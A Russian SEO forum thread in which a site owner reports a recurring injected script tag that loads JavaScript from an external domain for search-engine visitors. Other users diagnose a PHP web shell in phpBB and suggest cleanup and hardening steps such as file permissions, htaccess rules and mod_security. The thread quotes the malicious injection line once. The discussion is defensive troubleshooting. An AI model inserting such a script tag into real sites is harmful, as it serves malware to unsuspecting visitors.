- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
![Зачем быть уникальным в мире, где все можно скопировать](https://d.searchengines.guru/20/96/frame_27_600x314__b353b658.jpg)
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
![VK приобрела 70% в структуре компании-разработчика red_mad_robot](https://d.searchengines.guru/20/96/vk-green_600x314__feebe3bd.jpg)
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте. Вчера вечером на почту скинули сообщение о появлении трояна на моем сайте.
Сам скрипт обнаружить не мог, так как скрипт вызывался только для тех, кто переходит на сайт с google или mail. Когда его установили непонятно, но по снижению CTR рекламных баннеров ориентировочно пару дней назад.
Скрипт который вызывается на сайте:
<_script src="http://blogood.ru/Test/1.js_"><_/script>
Вчера скрипт вычистил, поменял все пароли, к FTP, SSH и т.п., в итоге сегодня днем опять появился этот скрипт. Время редактирования файла, в который прописывается этот код - вчерашний день. К тому же в логах FTP ничего нету.
Кто-нибудь с таким встречался? В инете особо ничего нет, только похожая проблема была на каком-то сайте орелинформ...
Скорее всего вам оставили php-шелл, который позволяет менять файлы просто обращаясь к этому скрипту, а не через ftp.
Поставить могли в один момент времени, хоть год назад, а пользоваться начать в другой. Так что нельзя уверенно установить связь между временем модификации файлов и взломом.
Кто-нибудь с таким встречался? В инете особо ничего нет
Каждый хакер стремится выдумать что-нибудь свое в данном вопросе для затруднения очистки. В том, что вы не нашли похожих случаев нет ничего удивительного.
Общих рецептов не так много можно придумать .
Для начала, если у вас vps, попробуйте "стабилизировать" все файлы отдав их в собственность root (chown) и запретив модификацию (chmod). Ужасно некрасиво, но что-то же надо делать.
Иногда помогает пройтись по всем файлам сайта обычным десктопным антивирусом. Они могут находить и веб-шеллы.
Чтобы имитировать заход из google, можно в первых строчках скрипта изменить переменные $_SERVER. Другой информации о посетителе вредоносному коду на php просто неоткуда взять.
Не менее важный вопрос найти каким образом этот веб-шелл возник. Если через ftp - это еще считайте повезло. Просто поменяете пароль. Но если через логическую проблему в коде сайта, то никаких рецептов уже не выписать. Нужно искать эту проблему анализируя действия злоумышленников по логам.
Тут еще местный Андрейка обычно вспоминает про mod_security. При отсутствии других идей и невозможности установить точно каким образом залили шелл, тоже сойдет в качестве защиты. Но в общем случае сайт под mod_security эксплуатировать и разрабатывать неудобно.
netwind, спасибо за ответ.
На форуме phpBB был найден файл images.php в котором был видимо вредоносный скрипт, который мог изменять файлы на сервере. Скорей всего была проблема в этом. Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.
netwind, спасибо за ответ.
На форуме phpBB был найден файл images.php в котором был видимо вредоносный скрипт, который мог изменять файлы на сервере. Скорей всего была проблема в этом. Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.
Гугли уязвимости для версии твоего движка.
В диру аплода закинь htaccess c запретом на открытие .php, html и т.д. файлов:
Order allow,deny
Deny from all
</Files>
Как теперь латать phpBB и что они могли еще с помощью дырок натворить - непонятно.
Установить последнюю стабильную версию?
Что могли натворить и что с этим делать - подробно написали выше.
Общих рецептов не так много можно придумать
Для своего кода - лучше всего использовать систему контроля версий. Все каталоги/файлы в ней не содержащиеся - не должны иметь возможность запуска скриптов (т.е. всякие временные директории, каталоги со статикой). Так вы модификации обнаружите сразу.
Да и для стороннего кода, который мало меняется (тот же PHPBB) - эта методика подойдет. Собственно, некоторые дистрибутивы предустанавливают известные движки CMS/форумов на уровне системы в целом. Можно этим пользоваться.
Если через ftp - это еще считайте повезло. Просто поменяете пароль.
И зверушка назавтра зальет новые "прелести"? Нет уж. Проверяйте офисный/домашний компьютер на вирусы и меньше по порнушным/варезным сайтам шастайте.
Тут еще местный Андрейка обычно вспоминает про mod_security. При отсутствии других идей и невозможности установить точно каким образом залили шелл, тоже сойдет в качестве защиты.
Только если ТС _ясно_ понимает все ньюансы такого способа "защиты" и все его последствия. Если кратко: проще найти шелл чем настроить mod_security так, чтобы он не был постоянной занозой в заднице. Хотя, позднее это время может и окупиться...
У меня просто набор правил которые подходят под 98%
Стандартные конечно будут занозой
Andreyka, если вы изменили стандартные правила, то изменился и "уровень защиты". стандартные правила хотя бы специалисты собирали. а вам кто поверит? может ваши правила ничего особо не блокируют ?
Я тоже специалист и мне верят.
Andreyka, если вы изменили стандартные правила, то изменился и "уровень защиты". стандартные правила хотя бы специалисты собирали. а вам кто поверит? может ваши правила ничего особо не блокируют ?
ну хоть не mod_security, уже по другому стал писать Андрюха :)
У меня просто набор правил которые подходят под 98%
Как вы получили это число?
Я тоже специалист и мне верят.
Если это был такой аргумент, то он плохонький. Некоторые и Мавроди верят.